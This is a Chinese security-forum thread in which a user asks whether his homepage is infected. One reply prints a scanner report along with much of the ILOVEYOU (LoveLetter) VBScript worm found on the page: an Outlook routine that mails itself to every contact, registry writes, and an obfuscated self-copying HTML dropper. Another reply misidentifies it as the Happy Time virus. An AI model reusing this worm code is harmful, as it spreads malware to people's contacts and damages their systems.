20CN网络安全小组论坛 - 病毒专区 - 看看我的主页,怎么老是

论坛: 病毒专区标题: 看看我的主页,怎么老是

复制本贴地址

作者: 112 [mnbvcxz123]

论坛用户

http://dfzx123.91i.net
自己看看啊，是不是被病毒攻击啊

地主发表时间: 06/30 16:51

回复: sky2003 [sky2003]

论坛用户

上传网页
覆盖掉

B1层发表时间: 07/01 17:33

回复: badboy [badboy]

论坛用户

当前正在执行的程序的名称和打开的文件的名称是：
"D:\Program Files\Tencent\qq\tbrowser.exe"
"http://dfzx123.91i.net "
*********************************************************************************************
可疑代码的动作如下：
有创建了E_Mail的对象的动作
有寻找 E_Mail 地址的动作
有发 E_Mail 的动作
有添加附件的动作
有读注册表的动作
有写注册表的动作
有创建文件对象的动作
有写文件的动作
有读文件的动作

*********************************************************************************************
可疑代码显示如下：

function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
end function

function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

sub spreadtoemail()
On Error Resume Next
dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application")
set mapi = out.GetNameSpace("MAPI")
for ctrlists = 1 to mapi.AddressLists.Count
set a = mapi.AddressLists(ctrlists)
x = 1
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
if (regv = "") then
regv = 1
end if
if (int(a.AddressEntries.Count) > int(regv)) then
for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x)
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)
if (regad = "") then
set male = out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_D
WORD"
end if
x = x + 1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.
Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.
Count
end if
next
Set out = Nothing
Set mapi = Nothing
end sub

sub html
On Error Resume Next
dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
dta1= "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@
CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft
Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"
&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-
FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#
-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>


<CENTER><a href="http://www.wu-long.net" target="_blank"><img src="http://www.wu-long.net/images/userpage_logo.gif" width="64" height="60" border="0"></a><a href="http://www.fujian-window.com/" target="_blank"><img src="http://www.wu-long.net/images/ad1.gif" width="468" height="60" border="0"></a></CENTER>

"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this H
TML file
<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z-------
------------
-z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
""&vbcrlf& _
"<?-?SCRIPT>"
dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'")
dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """")
dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/")
dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\")
dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'")
dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """")
dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/")
dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\")
set fso = CreateObject("Scripting.FileSystemObject")
set c = fso.OpenTextFile(WScript.ScriptFullName, 1)
lines = Split(c.ReadAll, vbcrlf)
l1 = ubound(lines)
for n = 0 to ubound(lines)
lines(n)=replace(lines(n), "'", chr(91) + chr(45) + chr(91))
lines(n)=replace(lines(n), """", chr(93) + chr(45) + chr(93))
lines(n)=replace(lines(n), "\", chr(37) + chr(45) + chr(37))
if (l1 = n) then

else

end if
next
set b=fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines, vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

[此贴被随风浮尘(badboy) 在 07月04日13时27分编辑过]

B2层发表时间: 07/04 13:35

回复: lovexp [lovexp]

论坛用户

啊是传说中的欢乐时光病毒啊？

B3层发表时间: 07/05 12:19

论坛: 病毒专区